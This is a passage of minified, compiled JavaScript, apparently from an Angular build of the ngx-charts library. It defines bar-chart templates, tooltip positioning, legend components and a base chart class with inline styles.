e=B();V("trimTicks",e.trimTicks)("maxTickLength",e.maxTickLength)("tickFormatting",e.tickFormatting)("tickArguments",e.tickArguments)("tickValues",e.ticks)("tickStroke",e.tickStroke)("scale",e.yScale)("orient",e.yOrient)("showGridLines",e.showGridLines)("gridLineWidth",e.dims.width)("referenceLines",e.referenceLines)("showRefLines",e.showRefLines)("showRefLabels",e.showRefLabels)("height",e.dims.height)}}function PEe(t,a){if(1&t&&(fi(),it(0,"g",3)),2&t){const e=B();V("label",e.labelText)("offset",e.labelOffset)("orient",e.yOrient)("height",e.dims.height)("width",e.dims.width)}}const OEe=["ngx-charts-svg-linear-gradient",""];function NEe(t,a){if(1&t&&(fi(),it(0,"stop")),2&t){const e=a.$implicit;ri("stop-color",e.color)("stop-opacity",e.opacity),Rt("offset",e.offset+"%")}}const cDe=["tooltipTemplate"],Hb=function(t,a){return[t,a]},_De=["ngx-charts-bar",""];function gDe(t,a){if(1&t&&(fi(),m(0,"defs"),it(1,"g",2),u()),2&t){const e=B();C(1),V("orientation",e.orientation)("name",e.gradientId)("stops",e.gradientStops)}}const CDe=["ngx-charts-bar-label",""],DDe=["ngx-charts-series-vertical",""];function xDe(t,a){if(1&t){const e=Ye();fi(),m(0,"g",2),he("select",function(n){return be(e),Me(B(2).onClick(n))})("activate",function(n){return be(e),Me(B(2).activate.emit(n))})("deactivate",function(n){return be(e),Me(B(2).deactivate.emit(n))}),u()}if(2&t){const e=a.$implicit,i=B(2);V("@animationState","active")("@.disabled",!i.animations)("width",e.width)("height",e.height)("x",e.x)("y",e.y)("fill",e.color)("stops",e.gradientStops)("data",e.data)("orientation",i.barOrientation.Vertical)("roundEdges",e.roundEdges)("gradient",i.gradient)("ariaLabel",e.ariaLabel)("isActive",i.isActive(e.data))("tooltipDisabled",i.tooltipDisabled)("tooltipPlacement",i.tooltipPlacement)("tooltipType",i.tooltipType)("tooltipTitle",i.tooltipTemplate?void 0:e.tooltipText)("tooltipTemplate",i.tooltipTemplate)("tooltipContext",e.data)("noBarWhenZero",i.noBarWhenZero)("animations",i.animations)}}function wDe(t,a){if(1&t&&(fi(),m(0,"g"),ne(1,xDe,1,22,"g",1),u()),2&t){const e=B();C(1),V("ngForOf",e.bars)("ngForTrackBy",e.trackBy)}}function IDe(t,a){if(1&t){const e=Ye();fi(),m(0,"g",2),he("select",function(n){return be(e),Me(B(2).onClick(n))})("activate",function(n){return be(e),Me(B(2).activate.emit(n))})("deactivate",function(n){return be(e),Me(B(2).deactivate.emit(n))}),u()}if(2&t){const e=a.$implicit,i=B(2);V("width",e.width)("height",e.height)("x",e.x)("y",e.y)("fill",e.color)("stops",e.gradientStops)("data",e.data)("orientation",i.barOrientation.Vertical)("roundEdges",e.roundEdges)("gradient",i.gradient)("ariaLabel",e.ariaLabel)("isActive",i.isActive(e.data))("tooltipDisabled",i.tooltipDisabled)("tooltipPlacement",i.tooltipPlacement)("tooltipType",i.tooltipType)("tooltipTitle",i.tooltipTemplate?void 0:e.tooltipText)("tooltipTemplate",i.tooltipTemplate)("tooltipContext",e.data)("noBarWhenZero",i.noBarWhenZero)("animations",i.animations)}}function RDe(t,a){if(1&t&&(fi(),m(0,"g"),ne(1,IDe,1,20,"g",1),u()),2&t){const e=B();C(1),V("ngForOf",e.bars)("ngForTrackBy",e.trackBy)}}function SDe(t,a){if(1&t){const e=Ye();fi(),m(0,"g",4),he("dimensionsChanged",function(n){const c=be(e).index;return Me(B(2).dataLabelHeightChanged.emit({size:n,index:c}))}),u()}if(2&t){const e=a.$implicit,i=B(2);V("barX",e.x)("barY",e.y)("barWidth",e.width)("barHeight",e.height)("value",e.total)("valueFormatting",i.dataLabelFormatting)("orientation",i.barOrientation.Vertical)}}function kDe(t,a){if(1&t&&(fi(),m(0,"g"),ne(1,SDe,1,7,"g",3),u()),2&t){const e=B();C(1),V("ngForOf",e.barsForDataLabels)("ngForTrackBy",e.trackDataLabelBy)}}function zDe(t,a){if(1&t){const e=Ye();fi(),m(0,"g",5),he("dimensionsChanged",function(n){return be(e),Me(B().updateXAxisHeight(n))}),u()}if(2&t){const e=B();V("xScale",e.xScale)("dims",e.dims)("showLabel",e.showXAxisLabel)("labelText",e.xAxisLabel)("trimTicks",e.trimXAxisTicks)("rotateTicks",e.rotateXAxisTicks)("maxTickLength",e.maxXAxisTickLength)("tickFormatting",e.xAxisTickFormatting)("ticks",e.xAxisTicks)("xAxisOffset",e.dataLabelMaxHeight.negative)}}function WDe(t,a){if(1&t){const e=Ye();fi(),m(0,"g",6),he("dimensionsChanged",function(n){return be(e),Me(B().updateYAxisWidth(n))}),u()}if(2&t){const e=B();V("yScale",e.yScale)("dims",e.dims)("showGridLines",e.showGridLines)("showLabel",e.showYAxisLabel)("labelText",e.yAxisLabel)("trimTicks",e.trimYAxisTicks)("maxTickLength",e.maxYAxisTickLength)("tickFormatting",e.yAxisTickFormatting)("ticks",e.yAxisTicks)}}function FDe(t,a){if(1&t){const e=Ye();fi(),m(0,"g")(1,"g",8),he("select",function(n){const c=be(e).$implicit;return Me(B(2).onClick(n,c))})("activate",function(n){const c=be(e).$implicit;return Me(B(2).onActivate(n,c))})("deactivate",function(n){const c=be(e).$implicit;return Me(B(2).onDeactivate(n,c))})("dataLabelHeightChanged",function(n){const c=be(e).index;return Me(B(2).onDataLabelMaxHeightChanged(n,c))}),u()()}if(2&t){const e=a.$implicit,i=B(2);V("@animationState","active"),Rt("transform",i.groupTransform(e)),C(1),V("type",i.barChartType.Stacked)("xScale",i.xScale)("yScale",i.yScale)("activeEntries",i.activeEntries)("colors",i.colors)("series",e.series)("dims",i.dims)("gradient",i.gradient)("tooltipDisabled",i.tooltipDisabled)("tooltipTemplate",i.tooltipTemplate)("showDataLabel",i.showDataLabel)("dataLabelFormatting",i.dataLabelFormatting)("seriesName",e.name)("animations",i.animations)("noBarWhenZero",i.noBarWhenZero)}}function VDe(t,a){if(1&t&&(fi(),m(0,"g"),ne(1,FDe,2,17,"g",7),u()),2&t){const e=B();C(1),V("ngForOf",e.results)("ngForTrackBy",e.trackBy)}}function BDe(t,a){if(1&t){const e=Ye();fi(),m(0,"g")(1,"g",8),he("select",function(n){const c=be(e).$implicit;return Me(B(2).onClick(n,c))})("activate",function(n){const c=be(e).$implicit;return Me(B(2).onActivate(n,c))})("deactivate",function(n){const c=be(e).$implicit;return Me(B(2).onDeactivate(n,c))})("dataLabelHeightChanged",function(n){const c=be(e).index;return Me(B(2).onDataLabelMaxHeightChanged(n,c))}),u()()}if(2&t){const e=a.$implicit,i=B(2);Rt("transform",i.groupTransform(e)),C(1),V("type",i.barChartType.Stacked)("xScale",i.xScale)("yScale",i.yScale)("activeEntries",i.activeEntries)("colors",i.colors)("series",e.series)("dims",i.dims)("gradient",i.gradient)("tooltipDisabled",i.tooltipDisabled)("tooltipTemplate",i.tooltipTemplate)("showDataLabel",i.showDataLabel)("dataLabelFormatting",i.dataLabelFormatting)("seriesName",e.name)("animations",i.animations)("noBarWhenZero",i.noBarWhenZero)}}function HDe(t,a){if(1&t&&(fi(),m(0,"g"),ne(1,BDe,2,16,"g",7),u()),2&t){const e=B();C(1),V("ngForOf",e.results)("ngForTrackBy",e.trackBy)}}function d6e(t,a,e){e=e||{};let i,n,r,c=null,d=0;function T(){d=!1===e.leading?0:+new Date,c=null,r=t.apply(i,n)}return function(){const k=+new Date;!d&&!1===e.leading&&(d=k);const q=a-(k-d);return i=this,n=arguments,q<=0?(clearTimeout(c),c=null,d=k,r=t.apply(i,n)):!c&&!1!==e.trailing&&(c=setTimeout(T,q)),r}}function m6e(t,a){return function(i,n,r){return{configurable:!0,enumerable:r.enumerable,get:function(){return Object.defineProperty(this,n,{configurable:!0,enumerable:r.enumerable,value:d6e(r.value,t,a)}),this[n]}}}}var kn=(()=>{return(t=kn||(kn={})).Top="top",t.Bottom="bottom",t.Left="left",t.Right="right",t.Center="center",kn;var t})();function oq(t,a,e){return e===kn.Top?t.top-7:e===kn.Bottom?t.top+t.height-a.height+7:e===kn.Center?t.top+t.height/2-a.height/2:void 0}function rq(t,a,e){return e===kn.Left?t.left-7:e===kn.Right?t.left+t.width-a.width+7:e===kn.Center?t.left+t.width/2-a.width/2:void 0}class Kl{static calculateVerticalAlignment(a,e,i){let n=oq(a,e,i);return n+e.height>window.innerHeight&&(n=window.innerHeight-e.height),n}static calculateVerticalCaret(a,e,i,n){let r;n===kn.Top&&(r=a.height/2-i.height/2+7),n===kn.Bottom&&(r=e.height-a.height/2-i.height/2-7),n===kn.Center&&(r=e.height/2-i.height/2);const c=oq(a,e,n);return c+e.height>window.innerHeight&&(r+=c+e.height-window.innerHeight),r}static calculateHorizontalAlignment(a,e,i){let n=rq(a,e,i);return n+e.width>window.innerWidth&&(n=window.innerWidth-e.width),n}static calculateHorizontalCaret(a,e,i,n){let r;n===kn.Left&&(r=a.width/2-i.width/2+7),n===kn.Right&&(r=e.width-a.width/2-i.width/2-7),n===kn.Center&&(r=e.width/2-i.width/2);const c=rq(a,e,n);return c+e.width>window.innerWidth&&(r+=c+e.width-window.innerWidth),r}static shouldFlip(a,e,i,n){let r=!1;return i===kn.Right&&a.left+a.width+e.width+n>window.innerWidth&&(r=!0),i===kn.Left&&a.left-e.width-n<0&&(r=!0),i===kn.Top&&a.top-e.height-n<0&&(r=!0),i===kn.Bottom&&a.top+a.height+e.height+n>window.innerHeight&&(r=!0),r}static positionCaret(a,e,i,n,r){let c=0,d=0;return a===kn.Right?(d=-7,c=Kl.calculateVerticalCaret(i,e,n,r)):a===kn.Left?(d=e.width,c=Kl.calculateVerticalCaret(i,e,n,r)):a===kn.Top?(c=e.height,d=Kl.calculateHorizontalCaret(i,e,n,r)):a===kn.Bottom&&(c=-7,d=Kl.calculateHorizontalCaret(i,e,n,r)),{top:c,left:d}}static positionContent(a,e,i,n,r){let c=0,d=0;return a===kn.Right?(d=i.left+i.width+n,c=Kl.calculateVerticalAlignment(i,e,r)):a===kn.Left?(d=i.left-e.width-n,c=Kl.calculateVerticalAlignment(i,e,r)):a===kn.Top?(c=i.top-e.height-n,d=Kl.calculateHorizontalAlignment(i,e,r)):a===kn.Bottom&&(c=i.top+i.height+n,d=Kl.calculateHorizontalAlignment(i,e,r)),{top:c,left:d}}static determinePlacement(a,e,i,n){if(Kl.shouldFlip(i,e,a,n)){if(a===kn.Right)return kn.Left;if(a===kn.Left)return kn.Right;if(a===kn.Top)return kn.Bottom;if(a===kn.Bottom)return kn.Top}return a}}let u6e=(()=>{class t{constructor(e,i,n){this.element=e,this.renderer=i,this.platformId=n}get cssClasses(){let e="ngx-charts-tooltip-content";return e+=` position-${this.placement}`,e+=` type-${this.type}`,e+=` ${this.cssClass}`,e}ngAfterViewInit(){setTimeout(this.position.bind(this))}position(){if(!ag(this.platformId))return;const e=this.element.nativeElement,i=this.host.nativeElement.getBoundingClientRect();if(!i.height&&!i.width)return;const n=e.getBoundingClientRect();this.checkFlip(i,n),this.positionContent(e,i,n),this.showCaret&&this.positionCaret(i,n),setTimeout(()=>this.renderer.addClass(e,"animate"),1)}positionContent(e,i,n){const{top:r,left:c}=Kl.positionContent(this.placement,n,i,this.spacing,this.alignment);this.renderer.setStyle(e,"top",`${r}px`),this.renderer.setStyle(e,"left",`${c}px`)}positionCaret(e,i){const n=this.caretElm.nativeElement,r=n.getBoundingClientRect(),{top:c,left:d}=Kl.positionCaret(this.placement,i,e,r,this.alignment);this.renderer.setStyle(n,"top",`${c}px`),this.renderer.setStyle(n,"left",`${d}px`)}checkFlip(e,i){this.placement=Kl.determinePlacement(this.placement,i,e,this.spacing)}onWindowResize(){this.position()}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(wr),Ee(lm))},t.\u0275cmp=Wt({type:t,selectors:[["ngx-tooltip-content"]],viewQuery:function(e,i){if(1&e&&Mi(nEe,5),2&e){let n;Vt(n=Bt())&&(i.caretElm=n.first)}},hostVars:2,hostBindings:function(e,i){1&e&&he("resize",function(){return i.onWindowResize()},0,zC),2&e&&_D(i.cssClasses)},inputs:{host:"host",showCaret:"showCaret",type:"type",placement:"placement",alignment:"alignment",spacing:"spacing",cssClass:"cssClass",title:"title",template:"template",context:"context"},decls:6,vars:6,consts:[[3,"hidden"],["caretElm",""],[1,"tooltip-content"],[4,"ngIf"],[3,"innerHTML",4,"ngIf"],[3,"ngTemplateOutlet","ngTemplateOutletContext"],[3,"innerHTML"]],template:function(e,i){1&e&&(m(0,"div"),it(1,"span",0,1),m(3,"div",2),ne(4,sEe,2,4,"span",3),ne(5,cEe,1,1,"span",4),u()()),2&e&&(C(1),Dv("tooltip-caret position-",i.placement,""),V("hidden",!i.showCaret),C(3),V("ngIf",!i.title),C(1),V("ngIf",i.title))},dependencies:[Ri,_1],styles:[".ngx-charts-tooltip-content{position:fixed;border-radius:3px;z-index:5000;display:block;font-weight:400;opacity:0;pointer-events:none!important}.ngx-charts-tooltip-content.type-popover{background:#fff;color:#060709;border:1px solid #72809b;box-shadow:0 1px 3px #0003,0 1px 1px #00000024,0 2px 1px -1px #0000001f;font-size:13px;padding:4px}.ngx-charts-tooltip-content.type-popover .tooltip-caret{position:absolute;z-index:5001;width:0;height:0}.ngx-charts-tooltip-content.type-popover .tooltip-caret.position-left{border-top:7px solid transparent;border-bottom:7px solid transparent;border-left:7px solid #fff}.ngx-charts-tooltip-content.type-popover .tooltip-caret.position-top{border-left:7px solid transparent;border-right:7px solid transparent;border-top:7px solid #fff}.ngx-charts-tooltip-content.type-popover .tooltip-caret.position-right{border-top:7px solid transparent;border-bottom:7px solid transparent;border-right:7px solid #fff}.ngx-charts-tooltip-content.type-popover .tooltip-caret.position-bottom{border-left:7px solid transparent;border-right:7px solid transparent;border-bottom:7px solid #fff}.ngx-charts-tooltip-content.type-tooltip{color:#fff;background:rgba(0,0,0,.75);font-size:12px;padding:0 10px;text-align:center;pointer-events:auto}.ngx-charts-tooltip-content.type-tooltip .tooltip-caret.position-left{border-top:7px solid transparent;border-bottom:7px solid transparent;border-left:7px solid rgba(0,0,0,.75)}.ngx-charts-tooltip-content.type-tooltip .tooltip-caret.position-top{border-left:7px solid transparent;border-right:7px solid transparent;border-top:7px solid rgba(0,0,0,.75)}.ngx-charts-tooltip-content.type-tooltip .tooltip-caret.position-right{border-top:7px solid transparent;border-bottom:7px solid transparent;border-right:7px solid rgba(0,0,0,.75)}.ngx-charts-tooltip-content.type-tooltip .tooltip-caret.position-bottom{border-left:7px solid transparent;border-right:7px solid transparent;border-bottom:7px solid rgba(0,0,0,.75)}.ngx-charts-tooltip-content .tooltip-label{display:block;line-height:1em;padding:8px 5px 5px;font-size:1em}.ngx-charts-tooltip-content .tooltip-val{display:block;font-size:1.3em;line-height:1em;padding:0 5px 8px}.ngx-charts-tooltip-content .tooltip-caret{position:absolute;z-index:5001;width:0;height:0}.ngx-charts-tooltip-content.position-right{transform:translate(10px)}.ngx-charts-tooltip-content.position-left{transform:translate(-10px)}.ngx-charts-tooltip-content.position-top{transform:translateY(-10px)}.ngx-charts-tooltip-content.position-bottom{transform:translateY(10px)}.ngx-charts-tooltip-content.animate{opacity:1;transition:opacity .3s,transform .3s;transform:translate(0);pointer-events:auto}.area-tooltip-container{padding:5px 0;pointer-events:none}.tooltip-item{text-align:left;line-height:1.2em;padding:5px 0}.tooltip-item .tooltip-item-color{display:inline-block;height:12px;width:12px;margin-right:5px;color:#5b646b;border-radius:3px}\n"],encapsulation:2}),function Ve(t,a,e,i){var c,n=arguments.length,r=n<3?a:null===i?i=Object.getOwnPropertyDescriptor(a,e):i;if("object"==typeof Reflect&&"function"==typeof Reflect.decorate)r=Reflect.decorate(t,a,e,i);else for(var d=t.length-1;d>=0;d--)(c=t[d])&&(r=(n<3?c(r):n>3?c(a,e,r):c(a,e))||r);n>3&&r&&Object.defineProperty(a,e,r)}([m6e(100)],t.prototype,"onWindowResize",null),t})(),sq=(()=>{class t{constructor(e,i,n){this.applicationRef=e,this.componentFactoryResolver=i,this.injector=n}static setGlobalRootViewContainer(e){t.globalRootViewContainer=e}getRootViewContainer(){if(this._container)return this._container;if(t.globalRootViewContainer)return t.globalRootViewContainer;if(this.applicationRef.components.length)return this.applicationRef.components[0];throw new Error("View Container not found! ngUpgrade needs to manually set this via setRootViewContainer or setGlobalRootViewContainer.")}setRootViewContainer(e){this._container=e}getComponentRootNode(e){return function f6e(t){return t.element}(e)?e.element.nativeElement:e.hostView&&e.hostView.rootNodes.length>0?e.hostView.rootNodes[0]:e.location.nativeElement}getRootViewContainerNode(e){return this.getComponentRootNode(e)}projectComponentBindings(e,i){if(i){if(void 0!==i.inputs){const n=Object.getOwnPropertyNames(i.inputs);for(const r of n)e.instance[r]=i.inputs[r]}if(void 0!==i.outputs){const n=Object.getOwnPropertyNames(i.outputs);for(const r of n)e.instance[r]=i.outputs[r]}}return e}appendComponent(e,i={},n){n||(n=this.getRootViewContainer());const r=this.getComponentRootNode(n),c=new Zw(r,this.componentFactoryResolver,this.applicationRef,this.injector),d=new hp(e),T=c.attach(d);return this.projectComponentBindings(T,i),T}}return t.globalRootViewContainer=null,t.\u0275fac=function(e){return new(e||t)(At(Yf),At(On),At(Ko))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),GI=(()=>{class t extends class h6e{constructor(a){this.injectionService=a,this.defaults={},this.components=new Map}getByType(a=this.type){return this.components.get(a)}create(a){return this.createByType(this.type,a)}createByType(a,e){e=this.assignDefaults(e);const i=this.injectComponent(a,e);return this.register(a,i),i}destroy(a){const e=this.components.get(a.componentType);if(e&&e.length){const i=e.indexOf(a);i>-1&&(e[i].destroy(),e.splice(i,1))}}destroyAll(){this.destroyByType(this.type)}destroyByType(a){const e=this.components.get(a);if(e&&e.length){let i=e.length-1;for(;i>=0;)this.destroy(e[i--])}}injectComponent(a,e){return this.injectionService.appendComponent(a,e)}assignDefaults(a){const e=Object.assign({},this.defaults.inputs),i=Object.assign({},this.defaults.outputs);return!a.inputs&&!a.outputs&&(a={inputs:a}),e&&(a.inputs=Object.assign(Object.assign({},e),a.inputs)),i&&(a.outputs=Object.assign(Object.assign({},i),a.outputs)),a}register(a,e){this.components.has(a)||this.components.set(a,[]),this.components.get(a).push(e)}}{constructor(e){super(e),this.type=u6e}}return t.\u0275fac=function(e){return new(e||t)(At(sq))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();var Su=(()=>{return(t=Su||(Su={})).Right="right",t.Below="below",Su;var t})(),Pg=(()=>{return(t=Pg||(Pg={})).ScaleLegend="scaleLegend",t.Legend="legend",Pg;var t})(),Wa=(()=>{return(t=Wa||(Wa={})).Time="time",t.Linear="linear",t.Ordinal="ordinal",t.Quantile="quantile",Wa;var t})();let cq=(()=>{class t{constructor(){this.horizontal=!1}ngOnChanges(e){const i=this.gradientString(this.colors.range(),this.colors.domain());this.gradient=`linear-gradient(to ${this.horizontal?"right":"bottom"}, ${i})`}gradientString(e,i){i.push(1);const n=[];return e.reverse().forEach((r,c)=>{n.push(`${r} ${Math.round(100*i[c])}%`)}),n.join(", ")}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ngx-charts-scale-legend"]],inputs:{valueRange:"valueRange",colors:"colors",height:"height",width:"width",horizontal:"horizontal"},features:[sa],decls:8,vars:10,consts:[[1,"scale-legend"],[1,"scale-legend-label"],[1,"scale-legend-wrap"]],template:function(e,i){1&e&&(m(0,"div",0)(1,"div",1)(2,"span"),s(3),u()(),it(4,"div",2),m(5,"div",1)(6,"span"),s(7),u()()()),2&e&&(ri("height",i.horizontal?void 0:i.height,"px")("width",i.width,"px"),Ct("horizontal-legend",i.horizontal),C(3),ke(i.valueRange[1].toLocaleString()),C(1),ri("background",i.gradient),C(3),ke(i.valueRange[0].toLocaleString()))},styles:[".chart-legend{display:inline-block;padding:0;width:auto!important}.chart-legend .scale-legend{text-align:center;display:flex;flex-direction:column}.chart-legend .scale-legend-wrap{display:inline-block;flex:1;width:30px;border-radius:5px;margin:0 auto}.chart-legend .scale-legend-label{font-size:12px}.chart-legend .horizontal-legend.scale-legend{flex-direction:row}.chart-legend .horizontal-legend .scale-legend-wrap{width:auto;height:30px;margin:0 16px}\n"],encapsulation:2,changeDetection:0}),t})();function Ub(t){return t instanceof Date?t.toLocaleDateString():t.toLocaleString()}let lq=(()=>{class t{constructor(){this.isActive=!1,this.select=new Tt,this.activate=new Tt,this.deactivate=new Tt,this.toggle=new Tt}get trimmedLabel(){return this.formattedLabel||"(empty)"}onMouseEnter(){this.activate.emit({name:this.label})}onMouseLeave(){this.deactivate.emit({name:this.label})}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ngx-charts-legend-entry"]],hostBindings:function(e,i){1&e&&he("mouseenter",function(){return i.onMouseEnter()})("mouseleave",function(){return i.onMouseLeave()})},inputs:{color:"color",label:"label",formattedLabel:"formattedLabel",isActive:"isActive"},outputs:{select:"select",activate:"activate",deactivate:"deactivate",toggle:"toggle"},decls:4,vars:6,consts:[["tabindex","-1",3,"title","click"],[1,"legend-label-color",3,"click"],[1,"legend-label-text"]],template:function(e,i){1&e&&(m(0,"span",0),he("click",function(){return i.select.emit(i.formattedLabel)}),m(1,"span",1),he("click",function(){return i.toggle.emit(i.formattedLabel)}),u(),m(2,"span",2),s(3),u()()),2&e&&(Ct("active",i.isActive),V("title",i.formattedLabel),C(1),ri("background-color",i.color),C(2),ct(" ",i.trimmedLabel," "))},encapsulation:2,changeDetection:0}),t})(),dq=(()=>{class t{constructor(e){this.cd=e,this.horizontal=!1,this.labelClick=new Tt,this.labelActivate=new Tt,this.labelDeactivate=new Tt,this.legendEntries=[]}ngOnChanges(e){this.update()}update(){this.cd.markForCheck(),this.legendEntries=this.getLegendEntries()}getLegendEntries(){const e=[];for(const i of this.data){const n=Ub(i);-1===e.findIndex(c=>c.label===n)&&e.push({label:i,formattedLabel:n,color:this.colors.getColor(i)})}return e}isActive(e){return!!this.activeEntries&&void 0!==this.activeEntries.find(n=>e.label===n.name)}activate(e){this.labelActivate.emit(e)}deactivate(e){this.labelDeactivate.emit(e)}trackBy(e,i){return i.label}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["ngx-charts-legend"]],inputs:{data:"data",title:"title",colors:"colors",height:"height",width:"width",activeEntries:"activeEntries",horizontal:"horizontal"},outputs:{labelClick:"labelClick",labelActivate:"labelActivate",labelDeactivate:"labelDeactivate"},features:[sa],decls:5,vars:9,consts:[["class","legend-title",4,"ngIf"],[1,"legend-wrap"],[1,"legend-labels"],["class","legend-label",4,"ngFor","ngForOf","ngForTrackBy"],[1,"legend-title"],[1,"legend-title-text"],[1,"legend-label"],[3,"label","formattedLabel","color","isActive","select","activate","deactivate"]],template:function(e,i){1&e&&(m(0,"div"),ne(1,lEe,3,1,"header",0),m(2,"div",1)(3,"ul",2),ne(4,dEe,2,4,"li",3),u()()()),2&e&&(ri("width",i.width,"px"),C(1),V("ngIf",(null==i.title?null:i.title.length)>0),C(2),ri("max-height",i.height-45,"px"),Ct("horizontal-legend",i.horizontal),C(1),V("ngForOf",i.legendEntries)("ngForTrackBy",i.trackBy))},dependencies:[lq,Ri,Zi],styles:[".chart-legend{display:inline-block;padding:0;width:auto!important}.chart-legend .legend-title{white-space:nowrap;overflow:hidden;margin-left:10px;margin-bottom:5px;font-size:14px;font-weight:700}.chart-legend ul,.chart-legend li{padding:0;margin:0;list-style:none}.chart-legend .horizontal-legend li{display:inline-block}.chart-legend .legend-wrap{width:calc(100% - 10px)}.chart-legend .legend-labels{line-height:85%;list-style:none;text-align:left;float:left;width:100%;border-radius:3px;overflow-y:auto;overflow-x:hidden;white-space:nowrap;background:rgba(0,0,0,.05)}.chart-legend .legend-label{cursor:pointer;font-size:90%;margin:8px;color:#afb7c8}.chart-legend .legend-label:hover{color:#000;transition:.2s}.chart-legend .legend-label .active .legend-label-text{color:#000}.chart-legend .legend-label-color{display:inline-block;height:15px;width:15px;margin-right:5px;color:#5b646b;border-radius:3px}.chart-legend .legend-label-text{display:inline-block;vertical-align:top;line-height:15px;font-size:12px;width:calc(100% - 20px);text-overflow:ellipsis;white-space:nowrap;overflow:hidden}.chart-legend .legend-title-text{vertical-align:bottom;display:inline-block;line-height:16px;overflow:hidden;white-space:nowrap;text-overflow:ellipsis}\n"],encapsulation:2,changeDetection:0}),t})(),mq=(()=>{class t{constructor(){this.showLegend=!1,this.animations=!0,this.legendLabelClick=new Tt,this.legendLabelActivate=new Tt,this.legendLabelDeactivate=new Tt,this.LegendPosition=Su,this.LegendType=Pg}ngOnChanges(e){this.update()}update(){let e=0;this.showLegend&&(this.legendType=this.getLegendType(),(!this.legendOptions||this.legendOptions.position===Su.Right)&&(e=this.legendType===Pg.ScaleLegend?1:2)),this.chartWidth=Math.floor(this.view[0]*(12-e)/12),this.legendWidth=this.legendOptions&&this.legendOptions.position!==Su.Right?this.chartWidth:Math.floor(this.view[0]*e/12)}getLegendType(){return this.legendOptions.scaleType===Wa.Linear?Pg.ScaleLegend:Pg.Legend}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ngx-charts-chart"]],inputs:{view:"view",showLegend:"showLegend",legendOptions:"legendOptions",legendType:"legendType",activeEntries:"activeEntries",animations:"animations"},outputs:{legendLabelClick:"legendLabelClick",legendLabelActivate:"legendLabelActivate",legendLabelDeactivate:"legendLabelDeactivate"},features:[ki([GI]),sa],ngContentSelectors:aq,decls:5,vars:6,consts:[[1,"ngx-charts-outer"],[1,"ngx-charts"],["class","chart-legend",3,"horizontal","valueRange","colors","height","width",4,"ngIf"],["class","chart-legend",3,"horizontal","data","title","colors","height","width","activeEntries","labelClick","labelActivate","labelDeactivate",4,"ngIf"],[1,"chart-legend",3,"horizontal","valueRange","colors","height","width"],[1,"chart-legend",3,"horizontal","data","title","colors","height","width","activeEntries","labelClick","labelActivate","labelDeactivate"]],template:function(e,i){1&e&&(Jn(),m(0,"div",0),fi(),m(1,"svg",1),va(2),u(),ne(3,mEe,1,5,"ngx-charts-scale-legend",2),ne(4,uEe,1,7,"ngx-charts-legend",3),u()),2&e&&(ri("width",i.view[0],"px"),C(1),Rt("width",i.chartWidth)("height",i.view[1]),C(2),V("ngIf",i.showLegend&&i.legendType===i.LegendType.ScaleLegend),C(1),V("ngIf",i.showLegend&&i.legendType===i.LegendType.Legend))},dependencies:[cq,dq,Ri],encapsulation:2,changeDetection:0}),t})(),p6e=(()=>{class t{constructor(e,i){this.element=e,this.zone=i,this.visible=new Tt,this.isVisible=!1,this.runCheck()}destroy(){clearTimeout(this.timeout)}onVisibilityChange(){this.zone.run(()=>{this.isVisible=!0,this.visible.emit(!0)})}runCheck(){const e=()=>{if(!this.element)return;const{offsetHeight:i,offsetWidth:n}=this.element.nativeElement;i&&n?(clearTimeout(this.timeout),this.onVisibilityChange()):(clearTimeout(this.timeout),this.zone.runOutsideAngular(()=>{this.timeout=setTimeout(()=>e(),100)}))};this.zone.runOutsideAngular(()=>{this.timeout=setTimeout(()=>e())})}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi))},t.\u0275dir=Ot({type:t,selectors:[["visibility-observer"]],outputs:{visible:"visible"}}),t})();function uq(t){return"[object Date]"===toString.call(t)}let hq=(()=>{class t{constructor(e,i,n,r){this.chartElement=e,this.zone=i,this.cd=n,this.platformId=r,this.scheme="cool",this.schemeType=Wa.Ordinal,this.animations=!0,this.select=new Tt}ngOnInit(){Zv(this.platformId)&&(this.animations=!1)}ngAfterViewInit(){this.bindWindowResizeEvent(),this.visibilityObserver=new p6e(this.chartElement,this.zone),this.visibilityObserver.visible.subscribe(this.update.bind(this))}ngOnDestroy(){this.unbindEvents(),this.visibilityObserver&&(this.visibilityObserver.visible.unsubscribe(),this.visibilityObserver.destroy())}ngOnChanges(e){this.update()}update(){if(this.results=this.results?this.cloneData(this.results):[],this.view)this.width=this.view[0],this.height=this.view[1];else{const e=this.getContainerDims();e&&(this.width=e.width,this.height=e.height)}this.width||(this.width=600),this.height||(this.height=400),this.width=Math.floor(this.width),this.height=Math.floor(this.height),this.cd&&this.cd.markForCheck()}getContainerDims(){let e,i;const n=this.chartElement.nativeElement;if(ag(this.platformId)&&null!==n.parentNode){const r=n.parentNode.getBoundingClientRect();e=r.width,i=r.height}return e&&i?{width:e,height:i}:null}formatDates(){for(let e=0;e<this.results.length;e++){const i=this.results[e];if(i.label=i.name,uq(i.label)&&(i.label=i.label.toLocaleDateString()),i.series)for(let n=0;n<i.series.length;n++){const r=i.series[n];r.label=r.name,uq(r.label)&&(r.label=r.label.toLocaleDateString())}}}unbindEvents(){this.resizeSubscription&&this.resizeSubscription.unsubscribe()}bindWindowResizeEvent(){if(!ag(this.platformId))return;const i=Tc(window,"resize").pipe(lp(200)).subscribe(n=>{this.update(),this.cd&&this.cd.markForCheck()});this.resizeSubscription=i}cloneData(e){const i=[];for(const n of e){const r={name:n.name};if(void 0!==n.value&&(r.value=n.value),void 0!==n.series){r.series=[];for(const c of n.series){const d=Object.assign({},c);r.series.push(d)}}void 0!==n.extra&&(r.extra=JSON.parse(JSON.stringify(n.extra))),i.push(r)}return i}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(qi),Ee(Ma),Ee(lm))},t.\u0275cmp=Wt({type:t,selectors:[["base-chart"]],inputs:{results:"results",view:"view",scheme:"scheme",schemeType:"schemeType",customColors:"customColors",animations:"animations"},outputs:{select:"select"},features:[sa],decls:1,vars:0,template:function(e,i){1&e&&it(0,"div")},encapsulation:2}),t})();var Fs=(()=>{return(t=Fs||(Fs={})).Top="top",t.Bottom="bottom",t.Left="left",t.Right="right",Fs;var 